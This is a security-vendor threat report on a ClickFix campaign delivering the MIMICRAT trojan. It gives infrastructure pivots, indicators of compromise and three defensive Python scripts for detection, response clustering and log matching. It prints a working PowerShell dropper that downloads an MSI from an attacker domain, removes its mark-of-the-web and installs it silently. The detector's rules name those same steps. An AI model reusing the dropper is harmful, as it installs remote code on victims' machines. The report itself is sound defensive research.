The Elastic Security Labs team recently published an insightful article about a “ClickFix” campaign, in which victims are tricked into running malicious commands themselves by copying and pasting them. The technique lets the attackers deliver a RAT known as MIMICRAT through several legitimate but compromised websites.

The Stormshield Customer Security Lab team observed that the campaign was still ongoing. Driven by our need to better understand the threat, we conducted additional investigations on March 3, 2026. These efforts enabled us to gather further information as well as additional Indicators of Compromise (IOCs).

The initial investigations

Elastic Security Labs’ initial report contains the following IOCs linked to MIMICRAT (SHA-256 hashes, IP addresses and a domain):

bcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1

Stage 1 PowerShell payload:

5e0a30d8d91d5fd46da73f3e6555936233d870ac789ca7dd64c9d3cc74719f51
a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b
055336daf2ac9d5bbc329fd52bb539085d00e2302fa75a0c7e9d52f540b28beb

Payload delivery infrastructure:

[four IP addresses, not preserved in this copy of the page]
d15mawx0xveem1.cloudfront[.]net

Applying the passive DNS resolution capabilities of the Validin tool to the IP addresses above gave us a long list of additional domains:

plugins-manager[.]network

www.connectmanager[.]network

www.plugins-manager[.]network

Several lessons can already be drawn:

  • Most of these domains were registered in early January.
  • The remaining ones were added later.
  • Some were even registered on the day this report was written, so additional domains are likely to appear in the coming weeks.
  • All of them were registered through the registrar NiceNIC.

The art of pivoting

IP 45.13.212[.]250

HTTP responses from the first payload delivery server (45.13.212[.]250) were not very useful.

The headers look standard, but the body varies with the requested URL, which suggests the server routes requests through virtual hosts. In every case we only received a near-empty page with a short message such as “db error”, “wp db error”, “OK”, “sever error” (sic) or simply “NO”. None of this gave us anything to pivot on.

IP 45.13.212[.]251

The second server (45.13.212[.]251) was more interesting: it returned a blank page with the message “hosting is blocked.” Pivoting on that exact body revealed several additional IP addresses serving the same page. Such a body is uncommon enough to make a useful pivot.

We were lucky: by the time of writing, these responses were already being replaced with HTTP 403 “Access Forbidden” responses, which would have closed this pivot.

Additional IP addresses retrieved (payload delivery infrastructure):

[five IP addresses, not preserved in this copy of the page]

Using the same passive DNS resolution, we obtained an impressive list of additional domains, including:

www.underfollowship[.]live

www.misselectionify[.]wiki

www.regularexpressions[.]re

By analyzing these domains, we observed the following:

  • Like the domains in Elastic Security Labs’ IOCs, all of them were registered in early 2026 through the registrar NiceNIC.
  • The certificate presented for mispolishal[.]com was misconfigured and not valid for that name: the server actually served the certificate for avprog[.]cc. Attackers make mistakes too.
  • Using GoBuster, we enumerated several files and directories hosted on these domains.
    • Some paths are fairly common, such as /js or /ps. Others are more interesting from an investigative standpoint, including /cmd, /update and similar paths.

The similarities keep adding up.

The domain msservice[.]network even exposes a /friend path that returns a PowerShell script:

$name = "ProgramData";
$programData = (Get-Item "env:$name").Value;   # resolves %ProgramData% indirectly
$inst = "FriendIstaller";
$path = Join-Path $programData $inst;
New-Item -ItemType Directory -Path $path -Force | Out-Null;   # C:\ProgramData\FriendIstaller
$path = Join-Path $path "friend.msi";
Start-BitsTransfer "https://msservice.network/friend.msi" "$path";   # download via BITS
Unblock-File $path;   # removes the Zone.Identifier (mark-of-the-web) stream if present
Start-Process msiexec.exe -ArgumentList "/i `"$path`" /qn /norestart" -Wait   # silent install

This script creates a FriendIstaller (sic) folder under C:\ProgramData, downloads friend.msi into it with BITS, removes the mark-of-the-web with Unblock-File and runs msiexec silently (/qn /norestart). At the time of our analysis the MSI was no longer available at that location, so we could not establish a direct link between this script and the broader campaign.

Additionally, the domain plugins-manager[.]network and the subdomain www.plugins-manager[.]network serve dropper-style PowerShell scripts similar to those described by Elastic Security Labs.
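The /friend script chains four behaviours that are individually common and jointly rare: a download, a drop under ProgramData, a mark-of-the-web removal and a silent msiexec install. The Python script below, an added example and not code from the Stormshield or Elastic reports, scores PowerShell script-block text (for instance the ScriptBlockText field of Windows event 4104, when script block logging is enabled) against those behaviours and flags a block only when it combines at least three of them. SAMPLE_BLOCKS[0] is the script quoted above; the other sample blocks are constructed to show what does and does not fire, and example.invalid is a placeholder hostname.

```python
"""Flag PowerShell script blocks that chain the behaviours of the /friend dropper.

Added example, not code from the Stormshield or Elastic reports. Input is the text
of PowerShell script blocks (e.g. the ScriptBlockText field of Windows event 4104).
SAMPLE_BLOCKS[0] is the script quoted in the article; the other blocks are
constructed to show what does and does not fire.
"""
import re

# Each rule names one behaviour of the observed dropper. Rules are deliberately
# loose on their own; a block is flagged only when it combines MIN_HITS of them,
# so a lone Unblock-File or a lone quiet install in an admin script does not fire.
RULES = [
    ("download",    re.compile(r"\b(Start-BitsTransfer|Invoke-WebRequest|iwr|curl|wget|DownloadFile)\b", re.I)),
    ("programdata", re.compile(r"ProgramData", re.I)),  # the script builds env:ProgramData from a string
    ("unblock",     re.compile(r"\bUnblock-File\b", re.I)),
    ("silent_msi",  re.compile(r"msiexec(\.exe)?.*?/i\b.*?/(qn|quiet)\b", re.I | re.S)),
    ("remote_msi",  re.compile(r"https?://[^\s\"']+\.msi\b", re.I)),
]
MIN_HITS = 3

SAMPLE_BLOCKS = [
    # 0: the dropper served from msservice[.]network/friend, as quoted in the article
    """$name = "ProgramData";
$programData = (Get-Item "env:$name").Value;
$inst = "FriendIstaller";
$path = Join-Path $programData $inst;
New-Item -ItemType Directory -Path $path -Force | Out-Null;
$path = Join-Path $path "friend.msi";
Start-BitsTransfer "https://msservice.network/friend.msi" "$path";
Unblock-File $path;
Start-Process msiexec.exe -ArgumentList "/i `"$path`" /qn /norestart" -Wait""",
    # 1: constructed benign admin one-liner: ProgramData + Unblock-File, no download, no msiexec
    r"Get-ChildItem $env:ProgramData\MyApp -Recurse | Unblock-File",
    # 2: constructed benign quiet install from a local path
    r"Start-Process msiexec.exe -ArgumentList '/i C:\Temp\app.msi /qn' -Wait",
    # 3: constructed variant: different download cmdlet, no ProgramData, no Unblock-File
    r"iwr https://example.invalid/x.msi -OutFile $env:TEMP\x.msi; msiexec /i $env:TEMP\x.msi /qn",
]

def score(block: str) -> list:
    """Names of the rules that match, in RULES order."""
    return [name for name, rx in RULES if rx.search(block)]

def is_dropper(block: str) -> bool:
    return len(score(block)) >= MIN_HITS

def scan(blocks) -> list:
    """(index, matched rule names) for every block that reaches the threshold."""
    return [(i, score(b)) for i, b in enumerate(blocks) if is_dropper(b)]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_BLOCKS):
        print(f"block {i}: {', '.join(hits)}")
```

The threshold is the point: block 3 is flagged even though it never touches ProgramData or Unblock-File, because a web download of an MSI followed by a quiet install is already the shape of the lure, while blocks 1 and 2 each hit only one or two rules and stay quiet. Tune MIN_HITS and the rule list against your own baseline of legitimate software deployment scripts before turning this into an alert.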

IP 23.227.202[.]114

We then took a closer look at the C2 server used for post-infection activity (23.227.202[.]114). Its HTTP response is a simple web page titled “CryptoBet Arena.” Pivoting on this title revealed two additional domains.

Both domains were registered in mid-January and resolve to an IP address in a shared cloud hosting environment. When accessed, they return a page with the same content as the C2 server. Based on these similarities, we assess that they are part of the attacker’s infrastructure.
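The two pivots used above, the “hosting is blocked” body on 45.13.212[.]251 and the “CryptoBet Arena” title on the C2 server, are the same operation: fingerprint a response and look for other hosts that return an identical page. The Python script below, an added example and not code from the Stormshield or Elastic reports or from any tool they cite, does that offline. SAMPLE_RESPONSES is constructed to mimic the behaviours described in this report (short status bodies, the “hosting is blocked” page, a 403 replacing it, the “CryptoBet Arena” title); 198.51.100.x and 203.0.113.x are documentation addresses, not observed infrastructure. In real use the dictionary would be filled from a scanner or an internet-scan API, which is outside this snippet.

```python
"""Cluster HTTP responses by a body fingerprint to find servers serving the same page.

Added example, not code from the Stormshield or Elastic reports. SAMPLE_RESPONSES is
constructed; 198.51.100.x and 203.0.113.x are documentation addresses.
"""
import hashlib
import re
from collections import defaultdict

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)

SAMPLE_RESPONSES = {
    # host: (status, body)
    "45.13.212[.]250": (200, "db error"),
    "45.13.212[.]251": (200, "<html><body>hosting is blocked</body></html>"),
    "198.51.100.10":   (200, "<html><body>hosting is blocked</body></html>"),
    "198.51.100.11":   (200, "<html>\n<body>hosting  is blocked</body>\n</html>"),
    "198.51.100.12":   (403, "<html><head><title>403 Forbidden</title></head></html>"),
    "203.0.113.5":     (200, "<html><head><title>CryptoBet Arena</title></head><body>...</body></html>"),
    "203.0.113.6":     (200, "<html><head><title>CryptoBet  Arena</title></head><body>...</body></html>"),
}

def normalise(body: str) -> str:
    """Lower-case, collapse whitespace runs and drop whitespace between tags, so that
    cosmetic differences (indentation, line endings) do not split a cluster."""
    s = re.sub(r"\s+", " ", body.lower()).strip()
    return re.sub(r">\s+<", "><", s)

def fingerprint(status: int, body: str) -> tuple:
    """(status, title, first 16 hex digits of SHA-256 of the normalised body)."""
    norm = normalise(body)
    m = TITLE_RE.search(norm)
    title = m.group(1).strip() if m else ""
    return (status, title, hashlib.sha256(norm.encode()).hexdigest()[:16])

def cluster(responses: dict) -> dict:
    """Group hosts by fingerprint. Singletons are dropped: a page served by a single
    host gives nothing to pivot on."""
    groups = defaultdict(list)
    for host, (status, body) in responses.items():
        groups[fingerprint(status, body)].append(host)
    return {fp: sorted(hosts) for fp, hosts in groups.items() if len(hosts) > 1}

def hosts_sharing(responses: dict, seed: str) -> list:
    """Hosts other than `seed` that return the same page as `seed`."""
    fp = fingerprint(*responses[seed])
    return sorted(h for h, r in responses.items() if h != seed and fingerprint(*r) == fp)

if __name__ == "__main__":
    for fp, hosts in cluster(SAMPLE_RESPONSES).items():
        print(fp, hosts)
```

Two details matter in practice. The 403 host is not clustered with the “hosting is blocked” hosts even though it is the same server a few days later, which is exactly why the window described above closes once the operator changes the response; and the fingerprint includes the status code, so a scanner that follows redirects or strips bodies will produce different keys than a raw fetch. Record the raw status and body and fingerprint those.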

Conclusion

Despite being detected, the attackers did not stop: we found new infrastructure, and more is likely to appear soon. As for the compromised websites used as the initial lure, Elastic Security Labs identified a few, but many more likely exist. Stay vigilant.

How to respond

  • Conduct regular cybersecurity awareness campaigns on phishing techniques in general, and on ClickFix in particular.
  • Follow cybersecurity best practices: network segmentation, strict access control policies, frequent updates and regular backups.
  • On Stormshield Network Security firewalls, enable IPS on inbound and outbound traffic and activate IP reputation-based filtering.
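Reputation filtering on the firewall is one use of the indicators in this report; another is a retroactive sweep of proxy and DNS logs. The Python script below, an added example and not code from the Stormshield or Elastic reports, refangs the defanged IOCs quoted in this article and matches them against log lines. The log lines are constructed samples in a generic “timestamp client action target” layout; the 10.0.0.x clients, www.example.com and www.cloudfront.net are placeholders used as controls. Domains match on the exact host or on any parent that is itself listed, so a new subdomain of plugins-manager[.]network is caught, while the legitimate cloudfront[.]net apex is not, because only the specific distribution hostname is an indicator.

```python
"""Refang the indicators from this report and match them against log lines.

Added example, not code from the Stormshield or Elastic reports. DEFANGED_IOCS copies
indicators quoted in the article; SAMPLE_LOG is constructed and is not a real proxy
or DNS log.
"""
import ipaddress
import re

DEFANGED_IOCS = [
    "45.13.212[.]250",
    "45.13.212[.]251",
    "23.227.202[.]114",
    "d15mawx0xveem1.cloudfront[.]net",
    "plugins-manager[.]network",
    "www.plugins-manager[.]network",
    "www.connectmanager[.]network",
    "msservice[.]network",
    "www.underfollowship[.]live",
    "www.misselectionify[.]wiki",
    "www.regularexpressions[.]re",
]

# Constructed log lines: 10.0.0.x are internal clients; www.example.com and
# www.cloudfront.net are benign controls that must not match.
SAMPLE_LOG = [
    "2026-03-03T10:12:01Z 10.0.0.12 GET https://www.plugins-manager.network/ps",
    "2026-03-03T10:12:05Z 10.0.0.12 CONNECT 45.13.212.250:443",
    "2026-03-03T10:13:40Z 10.0.0.33 GET https://www.example.com/index.html",
    "2026-03-03T10:14:02Z 10.0.0.45 DNS A cdn.plugins-manager.network",
    "2026-03-03T10:15:00Z 10.0.0.7 GET http://d15mawx0xveem1.cloudfront.net/update",
    "2026-03-03T10:16:00Z 10.0.0.8 GET https://www.cloudfront.net/",
]

# A hostname (something.tld) or a dotted IPv4, optionally preceded by a scheme and
# followed by a port and a path, which are discarded.
HOST_RE = re.compile(
    r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,}|\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/\S*)?",
    re.I,
)

def refang(ioc: str) -> str:
    """Undo the usual defanging conventions: [.] (.) [dot] (dot) and hxxp."""
    s = ioc.strip()
    for token in ("[.]", "(.)", "[dot]", "(dot)"):
        s = s.replace(token, ".")
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    return s.lower()

def split_iocs(iocs) -> tuple:
    """Separate refanged indicators into an IP set and a domain set."""
    ips, domains = set(), set()
    for raw in iocs:
        value = refang(raw)
        try:
            ipaddress.ip_address(value)
            ips.add(value)
        except ValueError:
            domains.add(value)
    return ips, domains

def hosts_in(line: str) -> list:
    return [m.group(1).lower().rstrip(".") for m in HOST_RE.finditer(line)]

def lookup(host: str, ips: set, domains: set):
    """Return the matching indicator: the host itself, or the closest listed parent
    domain (cdn.plugins-manager.network -> plugins-manager.network). The bare TLD is
    never tried."""
    if host in ips:
        return host
    parts = host.split(".")
    for i in range(len(parts) - 1):
        candidate = ".".join(parts[i:])
        if candidate in domains:
            return candidate
    return None

def scan_log(lines, iocs) -> list:
    """(line index, matched indicator) for every host in every line that matches."""
    ips, domains = split_iocs(iocs)
    hits = []
    for n, line in enumerate(lines):
        for host in hosts_in(line):
            match = lookup(host, ips, domains)
            if match:
                hits.append((n, match))
    return hits

if __name__ == "__main__":
    for n, match in scan_log(SAMPLE_LOG, DEFANGED_IOCS):
        print(f"line {n}: {SAMPLE_LOG[n]}  <-  {match}")
```

Note that the report lists www.underfollowship[.]live, www.misselectionify[.]wiki and www.regularexpressions[.]re as www hosts only, so the bare apex of those domains is not matched by this script; add the apex yourself if your policy treats the whole registered domain as hostile.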

Additional IOCs spotted

Payload delivery infrastructure (IP addresses):

[the IP addresses in this list were not preserved in this copy of the page]

Payload delivery infrastructure (domains):

plugins-manager[.]network
www.plugins-manager[.]network
www.connectmanager[.]network
www.underfollowship[.]live
www.regularexpressions[.]re
www.misselectionify[.]wiki

File hashes (SHA-256):

b3f35ad039855dcf6077aa1fdc95226e30d9b0d56ecce7df8813ac749d13adce

cf8e4b47e67e8ba5d580d92474d46b9aa49e6dbc7b306e805457e37fce7340ff

0a965688f7be1864efd1dedba14cc21756937208737b0eb30e9136c74f801f63

25e5531ea0678c1fad5a54363614e41f9eff0f58e3ced6d994583d07fbcf4001

3d88526b24cc62e7f59684bca45a17f9c477b05736d15329bb1c799327a7640a

453c92049c0d1db87d25cc44e986a4a78bbdb216e316008ec74ded0c0dc7b693

f8c8a1c1273661682c7da808bfdab4a13f469d7253e4b74a64802bf3954cc6c3

86fec08b6a514652a7abb3db63e641c6b2aa53e4867019beae297c6b71722e0d

8ee9b0242bd1e9731e7a0d8eb5770c2d935662b44e424dad4a77ab971e90a44e

ec2fe13f2cab9e62f19152aee657d2607f5c399beb55301e3db408543ad98693

09e762f6a5e75b48686382a2b43bcce5d4cdf395f62668ca8d1ba0ff8fc3e10e

e8a62f0a71a5d85a436ce3a37f9ed18167046521a991ea3d56b3df9b04a90ee5

518eedc1d34d2a04317d79a901a6e84a07030bf2651e6e2d3471ca304da58714

6b08f54c6cf8a858231f560a0950016290d715c410fd1864c92b4646351b79c4

82d43c4f2ef1305ff5d023d3ab720baf18107332a809cd1738e54053854d0b73

9633cbd68f6c8d36d332ec716808439396590abb43af9bd8f51aadc520f21013

9014529258e57cadd23df4380db88500887ff828f86807c8a274e309e7283842

7efe9fa6409a9a367bb46a64e6411b26c97d6be62f71f54aef20731c99a55559

dbd08af480c3a0f48ac0e951fec4edaa49b4154166a5c998c5de395d6d2321d6

cd3b136a6985fbbcc7cb29ce7352a0c365828b97d049098f8b2f0515aea54786

59a68e2744593a0df19defd29a42316ebf92cde67b74d8ed70d1495528019235

556aebbe03c496391a1b9bd9d89db0fa4e2bef00d1b83a5f9a4e5f803a311f6c

f2d096125de9c8be626b38bede8e6d487674b3326e8586f00b6d3df034be22a5

e92ec08658599ac94e6e51d1a8d6431a539a3c7078932f953749cd0ed65b09f4

38810a2c439b4e37f6e7f20e067b8aff5675f5f518583f4e308220e87297d4bb

569e990b1ee40842454f2bf2f52fa7159d572edb48587a27beb94635342b8346

809db7ef70cc5bc21c91760bc9a523b24a53a36a035d7d71172a4d9382b67bb6

26ba1918ddfe660da42e06ef868ac0f492e0d39c1b6ac69c709e6fcbcda8bf0d

cba89c41adddc57c2f852e6215de12c52ebf67afcef5e2d85d25597c7fff8b8d

fa5a6224c69ccb4610ad7f3eb911208c2560f225e8d17e27e83e540a5338f376

bc0d61e48a6731f4e20281b3c10607bc02800099f72acbe38bc79d1be14ebed3